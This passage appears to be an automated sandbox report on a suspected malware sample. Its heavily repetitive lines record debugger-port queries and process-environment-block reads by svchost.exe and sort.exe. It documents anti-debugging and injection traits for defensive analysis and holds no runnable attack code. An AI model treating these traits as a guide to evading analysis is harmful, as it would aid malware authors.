            Source: C:\Program Files\Mozilla Firefox\firefox.exe - API call chain: ExitProcess graph end node
            Source: C:\Windows\SysWOW64\svchost.exe - Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe - Process queried: DebugPort
            Source: C:\Windows\SysWOW64\sort.exe - Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_00417273 LdrLoadDll 8_2_00417273
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_036EF367 mov eax, dword ptr fs:[00000030h] 8_2_036EF367
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_036D437C mov eax, dword ptr fs:[00000030h] 8_2_036D437C
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_03637370 mov eax, dword ptr fs:[00000030h] 8_2_03637370
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_036B2349 mov eax, dword ptr fs:[00000030h] 8_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_0362D34C mov eax, dword ptr fs:[00000030h] 8_2_0362D34C
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_03705341 mov eax, dword ptr fs:[00000030h] 8_2_03705341
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_03629353 mov eax, dword ptr fs:[00000030h] 8_2_03629353
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_036B035C mov eax, dword ptr fs:[00000030h] 8_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_036B035C mov ecx, dword ptr fs:[00000030h] 8_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_036FA352 mov eax, dword ptr fs:[00000030h] 8_2_036FA352
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_036F132D mov eax, dword ptr fs:[00000030h] 8_2_036F132D
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_0365F32A mov eax, dword ptr fs:[00000030h] 8_2_0365F32A
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_03627330 mov eax, dword ptr fs:[00000030h] 8_2_03627330
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_036B930B mov eax, dword ptr fs:[00000030h] 8_2_036B930B
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_0366A30B mov eax, dword ptr fs:[00000030h] 8_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_0362C310 mov ecx, dword ptr fs:[00000030h] 8_2_0362C310
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_03650310 mov ecx, dword ptr fs:[00000030h] 8_2_03650310
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_036EF3E6 mov eax, dword ptr fs:[00000030h] 8_2_036EF3E6
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_037053FC mov eax, dword ptr fs:[00000030h] 8_2_037053FC
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_036403E9 mov eax, dword ptr fs:[00000030h] 8_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_0364E3F0 mov eax, dword ptr fs:[00000030h] 8_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_036663FF mov eax, dword ptr fs:[00000030h] 8_2_036663FF
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_036EC3CD mov eax, dword ptr fs:[00000030h] 8_2_036EC3CD
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_0363A3C0 mov eax, dword ptr fs:[00000030h] 8_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_036383C0 mov eax, dword ptr fs:[00000030h] 8_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_036EB3D0 mov ecx, dword ptr fs:[00000030h] 8_2_036EB3D0
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_036533A5 mov eax, dword ptr fs:[00000030h] 8_2_036533A5
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_036633A0 mov eax, dword ptr fs:[00000030h] 8_2_036633A0
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_0362E388 mov eax, dword ptr fs:[00000030h] 8_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_0365438F mov eax, dword ptr fs:[00000030h] 8_2_0365438F
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_0370539D mov eax, dword ptr fs:[00000030h] 8_2_0370539D
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_0368739A mov eax, dword ptr fs:[00000030h] 8_2_0368739A
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_03628397 mov eax, dword ptr fs:[00000030h] 8_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_03634260 mov eax, dword ptr fs:[00000030h] 8_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_036FD26B mov eax, dword ptr fs:[00000030h] 8_2_036FD26B
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_0362826B mov eax, dword ptr fs:[00000030h] 8_2_0362826B
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_03659274 mov eax, dword ptr fs:[00000030h] 8_2_03659274
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_03671270 mov eax, dword ptr fs:[00000030h] 8_2_03671270
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_036E0274 mov eax, dword ptr fs:[00000030h] 8_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_03629240 mov eax, dword ptr fs:[00000030h] 8_2_03629240
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_0366724D mov eax, dword ptr fs:[00000030h] 8_2_0366724D
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_0362A250 mov eax, dword ptr fs:[00000030h] 8_2_0362A250
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_036EB256 mov eax, dword ptr fs:[00000030h] 8_2_036EB256
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_03636259 mov eax, dword ptr fs:[00000030h] 8_2_03636259
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_03705227 mov eax, dword ptr fs:[00000030h] 8_2_03705227
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_0362823B mov eax, dword ptr fs:[00000030h] 8_2_0362823B
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_03667208 mov eax, dword ptr fs:[00000030h] 8_2_03667208
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_036E12ED mov eax, dword ptr fs:[00000030h] 8_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_036402E1 mov eax, dword ptr fs:[00000030h] 8_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_037052E2 mov eax, dword ptr fs:[00000030h] 8_2_037052E2
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_036EF2F8 mov eax, dword ptr fs:[00000030h] 8_2_036EF2F8
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_036292FF mov eax, dword ptr fs:[00000030h] 8_2_036292FF
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_0363A2C3 mov eax, dword ptr fs:[00000030h] 8_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_0365B2C0 mov eax, dword ptr fs:[00000030h] 8_2_0365B2C0
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_036392C5 mov eax, dword ptr fs:[00000030h] 8_2_036392C5
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_0362B2D3 mov eax, dword ptr fs:[00000030h] 8_2_0362B2D3
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_0365F2D0 mov eax, dword ptr fs:[00000030h] 8_2_0365F2D0
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_036402A0 mov eax, dword ptr fs:[00000030h] 8_2_036402A0
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_036452A0 mov eax, dword ptr fs:[00000030h] 8_2_036452A0
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_036F92A6 mov eax, dword ptr fs:[00000030h] 8_2_036F92A6
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_036C62A0 mov eax, dword ptr fs:[00000030h] 8_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_036C62A0 mov ecx, dword ptr fs:[00000030h] 8_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_036C72A0 mov eax, dword ptr fs:[00000030h] 8_2_036C72A0
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_036B92BC mov eax, dword ptr fs:[00000030h] 8_2_036B92BC
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_036B92BC mov ecx, dword ptr fs:[00000030h] 8_2_036B92BC
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_0366E284 mov eax, dword ptr fs:[00000030h] 8_2_0366E284
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_036B0283 mov eax, dword ptr fs:[00000030h] 8_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_03705283 mov eax, dword ptr fs:[00000030h] 8_2_03705283
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_0366329E mov eax, dword ptr fs:[00000030h] 8_2_0366329E
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_0362F172 mov eax, dword ptr fs:[00000030h] 8_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_036C9179 mov eax, dword ptr fs:[00000030h] 8_2_036C9179
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_03705152 mov eax, dword ptr fs:[00000030h] 8_2_03705152
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_036C4144 mov eax, dword ptr fs:[00000030h] 8_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_036C4144 mov ecx, dword ptr fs:[00000030h] 8_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_03629148 mov eax, dword ptr fs:[00000030h] 8_2_03629148
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_03637152 mov eax, dword ptr fs:[00000030h] 8_2_03637152
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_0362C156 mov eax, dword ptr fs:[00000030h] 8_2_0362C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03636154 mov eax, dword ptr fs:[00000030h]8_2_03636154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03636154 mov eax, dword ptr fs:[00000030h]8_2_03636154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03660124 mov eax, dword ptr fs:[00000030h]8_2_03660124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03631131 mov eax, dword ptr fs:[00000030h]8_2_03631131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03631131 mov eax, dword ptr fs:[00000030h]8_2_03631131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362B136 mov eax, dword ptr fs:[00000030h]8_2_0362B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362B136 mov eax, dword ptr fs:[00000030h]8_2_0362B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362B136 mov eax, dword ptr fs:[00000030h]8_2_0362B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362B136 mov eax, dword ptr fs:[00000030h]8_2_0362B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036DA118 mov ecx, dword ptr fs:[00000030h]8_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036DA118 mov eax, dword ptr fs:[00000030h]8_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036DA118 mov eax, dword ptr fs:[00000030h]8_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036DA118 mov eax, dword ptr fs:[00000030h]8_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F0115 mov eax, dword ptr fs:[00000030h]8_2_036F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036551EF mov eax, dword ptr fs:[00000030h]8_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036551EF mov eax, dword ptr fs:[00000030h]8_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036551EF mov eax, dword ptr fs:[00000030h]8_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036551EF mov eax, dword ptr fs:[00000030h]8_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036551EF mov eax, dword ptr fs:[00000030h]8_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036551EF mov eax, dword ptr fs:[00000030h]8_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036551EF mov eax, dword ptr fs:[00000030h]8_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036551EF mov eax, dword ptr fs:[00000030h]8_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036551EF mov eax, dword ptr fs:[00000030h]8_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036551EF mov eax, dword ptr fs:[00000030h]8_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036551EF mov eax, dword ptr fs:[00000030h]8_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036551EF mov eax, dword ptr fs:[00000030h]8_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036551EF mov eax, dword ptr fs:[00000030h]8_2_036551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036351ED mov eax, dword ptr fs:[00000030h]8_2_036351ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037061E5 mov eax, dword ptr fs:[00000030h]8_2_037061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036601F8 mov eax, dword ptr fs:[00000030h]8_2_036601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F61C3 mov eax, dword ptr fs:[00000030h]8_2_036F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F61C3 mov eax, dword ptr fs:[00000030h]8_2_036F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366D1D0 mov eax, dword ptr fs:[00000030h]8_2_0366D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366D1D0 mov ecx, dword ptr fs:[00000030h]8_2_0366D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036AE1D0 mov eax, dword ptr fs:[00000030h]8_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036AE1D0 mov eax, dword ptr fs:[00000030h]8_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036AE1D0 mov ecx, dword ptr fs:[00000030h]8_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036AE1D0 mov eax, dword ptr fs:[00000030h]8_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036AE1D0 mov eax, dword ptr fs:[00000030h]8_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037051CB mov eax, dword ptr fs:[00000030h]8_2_037051CB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036E11A4 mov eax, dword ptr fs:[00000030h]8_2_036E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036E11A4 mov eax, dword ptr fs:[00000030h]8_2_036E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036E11A4 mov eax, dword ptr fs:[00000030h]8_2_036E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036E11A4 mov eax, dword ptr fs:[00000030h]8_2_036E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0364B1B0 mov eax, dword ptr fs:[00000030h]8_2_0364B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03670185 mov eax, dword ptr fs:[00000030h]8_2_03670185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036EC188 mov eax, dword ptr fs:[00000030h]8_2_036EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036EC188 mov eax, dword ptr fs:[00000030h]8_2_036EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B019F mov eax, dword ptr fs:[00000030h]8_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B019F mov eax, dword ptr fs:[00000030h]8_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B019F mov eax, dword ptr fs:[00000030h]8_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B019F mov eax, dword ptr fs:[00000030h]8_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362A197 mov eax, dword ptr fs:[00000030h]8_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362A197 mov eax, dword ptr fs:[00000030h]8_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362A197 mov eax, dword ptr fs:[00000030h]8_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03687190 mov eax, dword ptr fs:[00000030h]8_2_03687190
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B106E mov eax, dword ptr fs:[00000030h]8_2_036B106E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03705060 mov eax, dword ptr fs:[00000030h]8_2_03705060
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03641070 mov eax, dword ptr fs:[00000030h]8_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03641070 mov ecx, dword ptr fs:[00000030h]8_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03641070 mov eax, dword ptr fs:[00000030h]8_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03641070 mov eax, dword ptr fs:[00000030h]8_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03641070 mov eax, dword ptr fs:[00000030h]8_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03641070 mov eax, dword ptr fs:[00000030h]8_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03641070 mov eax, dword ptr fs:[00000030h]8_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03641070 mov eax, dword ptr fs:[00000030h]8_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03641070 mov eax, dword ptr fs:[00000030h]8_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03641070 mov eax, dword ptr fs:[00000030h]8_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03641070 mov eax, dword ptr fs:[00000030h]8_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03641070 mov eax, dword ptr fs:[00000030h]8_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03641070 mov eax, dword ptr fs:[00000030h]8_2_03641070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0365C073 mov eax, dword ptr fs:[00000030h]8_2_0365C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036AD070 mov ecx, dword ptr fs:[00000030h]8_2_036AD070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03632050 mov eax, dword ptr fs:[00000030h]8_2_03632050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036D705E mov ebx, dword ptr fs:[00000030h]8_2_036D705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036D705E mov eax, dword ptr fs:[00000030h]8_2_036D705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0365B052 mov eax, dword ptr fs:[00000030h]8_2_0365B052
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362A020 mov eax, dword ptr fs:[00000030h]8_2_0362A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362C020 mov eax, dword ptr fs:[00000030h]8_2_0362C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F903E mov eax, dword ptr fs:[00000030h]8_2_036F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F903E mov eax, dword ptr fs:[00000030h]8_2_036F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F903E mov eax, dword ptr fs:[00000030h]8_2_036F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F903E mov eax, dword ptr fs:[00000030h]8_2_036F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0364E016 mov eax, dword ptr fs:[00000030h]8_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0364E016 mov eax, dword ptr fs:[00000030h]8_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0364E016 mov eax, dword ptr fs:[00000030h]8_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0364E016 mov eax, dword ptr fs:[00000030h]8_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036550E4 mov eax, dword ptr fs:[00000030h]8_2_036550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036550E4 mov ecx, dword ptr fs:[00000030h]8_2_036550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]8_2_0362A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036380E9 mov eax, dword ptr fs:[00000030h]8_2_036380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362C0F0 mov eax, dword ptr fs:[00000030h]8_2_0362C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036720F0 mov ecx, dword ptr fs:[00000030h]8_2_036720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036470C0 mov eax, dword ptr fs:[00000030h]8_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036470C0 mov ecx, dword ptr fs:[00000030h]8_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036470C0 mov ecx, dword ptr fs:[00000030h]8_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036470C0 mov eax, dword ptr fs:[00000030h]8_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036470C0 mov ecx, dword ptr fs:[00000030h]8_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036470C0 mov ecx, dword ptr fs:[00000030h]8_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036470C0 mov eax, dword ptr fs:[00000030h]8_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036470C0 mov eax, dword ptr fs:[00000030h]8_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036470C0 mov eax, dword ptr fs:[00000030h]8_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036470C0 mov eax, dword ptr fs:[00000030h]8_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036470C0 mov eax, dword ptr fs:[00000030h]8_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036470C0 mov eax, dword ptr fs:[00000030h]8_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036470C0 mov eax, dword ptr fs:[00000030h]8_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036470C0 mov eax, dword ptr fs:[00000030h]8_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036470C0 mov eax, dword ptr fs:[00000030h]8_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036470C0 mov eax, dword ptr fs:[00000030h]8_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036470C0 mov eax, dword ptr fs:[00000030h]8_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036470C0 mov eax, dword ptr fs:[00000030h]8_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037050D9 mov eax, dword ptr fs:[00000030h]8_2_037050D9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036AD0C0 mov eax, dword ptr fs:[00000030h]8_2_036AD0C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036AD0C0 mov eax, dword ptr fs:[00000030h]8_2_036AD0C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B20DE mov eax, dword ptr fs:[00000030h]8_2_036B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036590DB mov eax, dword ptr fs:[00000030h]8_2_036590DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F60B8 mov eax, dword ptr fs:[00000030h]8_2_036F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F60B8 mov ecx, dword ptr fs:[00000030h]8_2_036F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0363208A mov eax, dword ptr fs:[00000030h]8_2_0363208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362D08D mov eax, dword ptr fs:[00000030h]8_2_0362D08D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03635096 mov eax, dword ptr fs:[00000030h]8_2_03635096
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0365D090 mov eax, dword ptr fs:[00000030h]8_2_0365D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0365D090 mov eax, dword ptr fs:[00000030h]8_2_0365D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366909C mov eax, dword ptr fs:[00000030h]8_2_0366909C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362B765 mov eax, dword ptr fs:[00000030h]8_2_0362B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362B765 mov eax, dword ptr fs:[00000030h]8_2_0362B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362B765 mov eax, dword ptr fs:[00000030h]8_2_0362B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362B765 mov eax, dword ptr fs:[00000030h]8_2_0362B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03638770 mov eax, dword ptr fs:[00000030h]8_2_03638770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03640770 mov eax, dword ptr fs:[00000030h]8_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03640770 mov eax, dword ptr fs:[00000030h]8_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03640770 mov eax, dword ptr fs:[00000030h]8_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03640770 mov eax, dword ptr fs:[00000030h]8_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03640770 mov eax, dword ptr fs:[00000030h]8_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03640770 mov eax, dword ptr fs:[00000030h]8_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03640770 mov eax, dword ptr fs:[00000030h]8_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03640770 mov eax, dword ptr fs:[00000030h]8_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03640770 mov eax, dword ptr fs:[00000030h]8_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03640770 mov eax, dword ptr fs:[00000030h]8_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03640770 mov eax, dword ptr fs:[00000030h]8_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03640770 mov eax, dword ptr fs:[00000030h]8_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03643740 mov eax, dword ptr fs:[00000030h]8_2_03643740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03643740 mov eax, dword ptr fs:[00000030h]8_2_03643740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03643740 mov eax, dword ptr fs:[00000030h]8_2_03643740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366674D mov esi, dword ptr fs:[00000030h]8_2_0366674D
